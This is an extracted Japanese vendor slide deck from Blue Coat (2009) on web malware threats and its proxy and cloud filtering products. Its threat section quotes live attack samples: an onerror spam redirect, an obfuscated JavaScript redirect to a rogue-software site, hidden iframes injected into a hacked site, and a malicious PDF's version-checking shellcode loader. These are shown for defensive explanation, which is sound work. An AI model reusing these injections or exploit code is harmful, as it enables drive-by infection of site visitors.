doc講演資料ダウンロード
download 
Report Transcription
講演資料ダウンロード
セキュリティ担当者必見!
マルウェアなど新たな脅威から
効果的に防御する方法
ブルーコートシステムズ合同会社
テクノロジーディレクター
草薙 伸
Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered
in certain jurisdictions. All other product or service names are the property of their respective owners.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
Webの進化
Forums
Blogswww
Wikis
Guestbooks
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
Search Engine View
リンクスパムの例
3
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
サーチエンジンをだます
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
リダイレクト
<td class="row1" width="100%" height="50"><span class="forumlink"> <a href="kylie-diegof76426,eff,21998.html" class="forumlink">Kylie Diego</a><br /></span>
<span class="genmed">
<img src="sfs"
onerror="document.location='htt'+'p://goot'+'meds.'+'com?q=phentermine&said=f_easit_20';">
phentermine capsule 30mg <br>
phentermine <br>
phentermine phentremine phentramine <br>
phentermine and topiramate <br>
ordering phentermine pharmacy online <br>
facial twitches caused by phentermine <br>
is phentermine dangerous <br>
legit phentermine websites <br>
mg buy phentermine <br>
bogus phentermine websites <br>
phentermine prescription o nline <br>
phentermine isotretinoin <br>
phentermine online us pharmacy free consultation <br>
phentermine bahrain <br>
phentermine next day delivery us <br>
carisoprodol phentermine yellow <br>
order phentermine without doctors prescription <br>
buy phentermine in th uk <br>
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ローグウェアの例
8
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
マルウェアにリダイレクトされるサイト
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ここは無害
<html><head><title>Install Keys Satellite</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="index, follow" />
</head><body bgcolor=#59746>
<style>
body { font-family: verdana;
margin: 10px 100px;
}
</style>
<h3>Install Keys Satellite</h3>
<strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007
ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse
shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air
filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size:
16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood
install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font
color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45
<strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install
themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active
directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell
workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font
color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe
install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font
color=#41FE63 style="font-size: 12px;">linksys 54g install</font>
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
検索
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
問題あり
<html><head><title>Install Keys Satellite</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="index, follow" />
</head><body bgcolor=#59746>
<script language="javascript">
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%6
1%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29
%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74
<script language="javascript">
%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27
function dF(s){var s1=unescape(s.substr(0,s.length-1));var t="";
<script>
%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2
for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write
B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%3
document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169";
(unescape(t));}
1%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E
</script>
</script>
%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%7
2%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%6
3%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dp
n0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1');
</script>
<style>
body { font-family: verdana;
margin: 10px 100px;
}
</style>
<h3>Install Keys Satellite</h3>
<strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex
<i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse
shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air
filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size:
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
やさしい助言
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
“問題発生”
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
“大きな問題に”
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
“マルウェア” インジェクション
20
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
犠牲者
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
犠牲者
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>İNKA Yapı Kimyasalları</title>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META http-equiv=Content-Language content=tr>
<META content=INDEX,FOLLOW name=ROBOTS>
<link rel="stylesheet" type="text/css" href="css/css.css" media="all" />
<script type="text/javascript" src="js/js.js"></script>
</head>
<body
onLoad="MM_preloadImages('img/lang_en_ov.jpg','img/menu1ov.jpg','img/menu2ov.jpg','img/menu3ov.jpg','img/menu4ov.jpg','img/me
nu5ov.jpg','img/menu6ov.jpg','img/menu7ov.jpg')"><iframe
src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility:
hidden"></iframe><iframe src="http://homenameregistration.cn/in.cgi?income10" width=1
height=1 style="visibility: hidden"></iframe>
<div id="header">
<div class="lang"><a href="index_en.php" onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('lang1','','img/lang_en_ov.jpg',1)"><img src="img/lang_en.jpg" alt="english" name="lang1" width="69"
height="28" border="0"></a></div>
<div class="logo"><a href="?Anasayfa"><img src="img/logo.gif" width="773" height="91"></a></div>
<div class="menu"><a href="?Anasayfa" onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('menu1','','img/menu1ov.jpg',1)"><img src="img/menu1.jpg" alt="Ana Sayfa" name="menu1"
width="110" height="25" border="0"></a><a href="?Hakkimizda" onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('menu2','','img/menu2ov.jpg',1)"><img src="img/menu2.jpg" alt="Hakkımızda" name="menu2"
wih="111" height="25" border="0">
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
リレー
<html>
<body>
<script>
function pdfswf()
{
try {
for(i = 0; i <= navigator.plugins.length; i++) {
name = navigator.plugins[i].name;
if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
{
document.write('<iframe src="cache/readme.pdf"></iframe>');
}
if(name.indexOf("Flash") != -1)
{
document.write('<iframe src="cache/flash.swf"></iframe>');
}
}
}
catch(e){}
}
pdfswf();
</script>
</body>
</html>
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
PDFファイル
0000000
%
P
D
F
1
.
3 ¥n
3
0
0000020 ¥n
<
<
/
T
y
p
e
/
P
a
g
0000040
P
a
r
e
n
t
1
0
R ¥n
0000060
s
o
u
r
c
e
s
2
0
R
0000100
o
n
t
e
n
t
s
4
0
R
0000120
e
n
d
o
b
j ¥n
4
0
o
b
0000140
<
/
F
i
l
t
e
r
/
F
l
a
0000160
e
c
o
d
e
/
L
e
n
g
t
h
0000200
7
>
> ¥n
s
t
r
e
a
m ¥n
x 234
0000220
s 233
0 024 274 347
W 274
c
{
y 225 204
0000240 351
$ 323 346 222
C
H
z 306 006 307
d
¥
0000260 232 177 337 207 205 035 033 ¥t 203 335 036 374
1
0000300 355 333
]
I 002 356 256 030
* ¥r 357
W 327
...
0002440
0
o
b
j ¥n
<
< ¥n
/
S
0002460
v
a
S
c
r
i
p
t ¥n
/
J
S
0002500
a
l
¥
(
u
n
e
s
c
a
p
e
¥
0002520
u
0
0
7
6
%
u
0
0
6
1
%
u
0002540
2
%
u
0
0
2
0
%
u
0
0
7
2
0002560
0
5
9
%
u
0
0
4
b
%
u
0
0
0002600
u
0
0
4
3
%
u
0
0
4
5
%
u
0002620
1
%
u
0
0
5
2
%
u
0
0
7
3
0002640
0
6
c
%
u
0
0
2
0
%
u
0
0
0002660
u
0
0
2
0
%
u
0
0
6
1
%
u
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
o
e
/
¥n
>
j
t
255
204
310
330
1
/
(
(
0
%
4
0
%
3
0
b
j
¥n
/
R
e
/
C
> ¥n
¥n
<
e
D
8
1
W
M
304 321
¥0
N
Z
=
| 273
J
e
'
0
u
8
0
u
d
0
a
v
%
7
0
%
3
0
%
7
悪意のあるペイロード
/JS
(eval¥(unescape¥('%u0076%u0061%u0072%u0020%u00
72%u0059%u004b%u0048%u0043%u0045%u0031%u00
52%u0073%u006c%u0020%u003d%u0020%u0061%u007
0%u0070%u002e%u0076%u0069%u0065%u0077%u006
5%u0072%u0056%u0065%u0072%u0073%u0069%u006f
%u006e%u002e%u0074%u006f%u0053%u0074%u0072
%u0069%u006e%u0067%u0028%u0029%u003b%u0072
%u0059%u004b%u0048%u0043%u0045%u0031%u0052
%u0073%u006c%u0020%u003d%u0020%u0072%u0059
%u004b%u0048
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
JavaScriptコード
var rYKHCE1Rsl = app.viewerVersion.toString();rYKHCE1Rsl =
rYKHCE1Rsl.replace(/¥D/g,"");if(rYKHCE1Rsl.charAt(0) == "8" &&
rYKHCE1Rsl.charAt(1) <= "1" && rYKHCE1Rsl.charAt(2) <=
"2"){xS5Ov8Jb = unescape("%u5350%u" + "5251%u57" +
"56%u9c55" + "%u00e8%u" + "0000%u5d" + "00%ued83" +
"%u310d%u" + "64c0%u40" + "03%u7830" + "%u8b0c%u" +
"0c40%u70" + "8b%uad1c" + "%u408b%u" + "eb08%u8b" +
"09%u3440" + "%u408d%u" + "8b7c%u3c" + "40%u5756" +
"%u5ebe%u" + "0001%u01" + "00%ubfee" + "%u014e%u" +
"0000%uef" + "01%ud6e8" + "%u0001%u" + "5f00%u89" +
"5e%u81ea" + "%u5ec2%u" + "0001%u52" + "00%u8068" +
"%u0000%u" + "ff00%u4e" + "95%u0001" + "%u8900%u" +
"81ea%u5e" +
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
従来のやり方はコストが必要
– 脅威のサイクルは短くなっている
– マルウェアは短時間で拡散する
従来の防御策は間に合わない
– ダイナミックではない
シグネチャによるブロック
日単位のアップデート
第一世代のURLフィルタリング
– Webを認識できない
– パフォーマンスのためにセキュリティを犠
牲にする
27
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ソリューション: Web + ネットワークセキュリティ
ネットワークセキュリティ
Webセキュリティ
Web 2.0
Internet
WAN/Intranet
Blue Coat ProxySG
ネットワークとWebアプリケー
ションレベルのセキュリティが
最大の防御
28
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
モバイルセキュリティ
Blue Coat
ProxyClient
モバイルユーザ
レイヤード防御
クラウドセキュリティ
WebPulse
インライン脅威検知
ProxyAV
Webアプリとコンテンツコントロール
ProxySG + WebFilter
Web セキュリティ
クラウドマルウェア防御
SSL インスペクション
詳細なポリシ
動的なURLフィルタリング
L4-L7
リモートユーザの保護
Blue Coat情報漏えい
Solution
データ漏洩保護ソリューションとの統合
ProxySG with S-ICAP
モバイルセキュリティ
ProxyClient
ネットワークレイヤセキュリティ
29
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ネットワークセキュリティ
境界での防御
アクセスコントロール
L2-L4
ステートフルインスペクション
Firewall DoS防御
ダイナミックリンク分析:
Webセキュリティの新しいストラテジー
クラウドに接続されたコミュニティを活用
素早くURLの脅威とレーティングを分析
マスタデータベースが更新されると、クラウド内のすべてのメ
ンバーを防御
より多くWebの脅威を発見
より多くのAV防御
アップデートなしの防御
どの場所でも有効
30
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ダイナミックリンク分析
クラウド
コミュニティ
リアルタイム
Webマルウェア
防御
Web Gateways
Remote Users
クラウドコミュニティがアップデート
31
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ダイナミックリンク分析の導入
複数の脅威エンジン
機械分析
人による解析
WebFilter
5400万ユーザ
一週間に10億
以上のリクエスト
ProxySG & ProxyClient
Enterprise Users
K9 Consumer Users
マルウェア攻撃の防御
32
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
WebPulseの動作
Web contents
Real time update
Multiple Threat Engines
It’s
It’s Bad
bad
Machine Analysis
Internet
Human Raters
Web contents
w/ malware
WebPulse Datacenter
It’s
good
Don’t
Know
ProxySG
Users
ProxySG
ProxySG
33
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ProxySG 詳細なポリシー制御
ビジネス
加速
Web &SaaS
Internet
ブロック
34
Who are
you?
Group/dept
you belong
to
Your
location
Application
Category of
web site
IM
attachment /
keyword
Date/Time
of day
Browser
type
Content
type
Customizable Policy Engine
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
コントロール
マルウェア & 悪
い Web
良い Web
Content
ITをビジネス上のバリューセ
ンターとするため、ネットワー
クのWebの使用を最大
限に活用する
一つのプラットフォームで複数のセキュリティ
High
Performance
Intranet Web
Server
Granular
content mgt
policies
WebPulse
Per User
Control
Acceleration
& Bandwidth
Management
Dynamic URL
Filtering
Internal
Network
Public
Web
Server
Internet
Spyware
blocking and
reporting
ProxySG
Web
Security
Per User
Activity
Reporting
Instant
Messenger
Control
Peer-to-Peer
Control
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
Anti-Virus
Protection
レイヤードディフェンスソリューション
Reporter
WebPulse
ProxyAV
Kaspersky
Sophos
McAfee
Panda
WebFilter
SYMC/Vontu
RSA Tablus
VeriCept
MFE/Reconnex
Code Green
Optimization
Bandwidth Mgmt
Protocol Optimiz.
Caching/Acceler.
Stream Splitting
ProxyClient
ポリシーパフォーマンス
ProxySG
36
Data Loss
Prevention
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
認証
シングルポイントでのコントロール
Director
企業ネットワークの防御
Webセキュリティ
アプリケーション制御
Layers 4-7
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
ネットワークセキュリティ
ネットワーク制御
Layers 2-3
© Blue Coat Systems, Inc. 2009. All Rights Reserved.
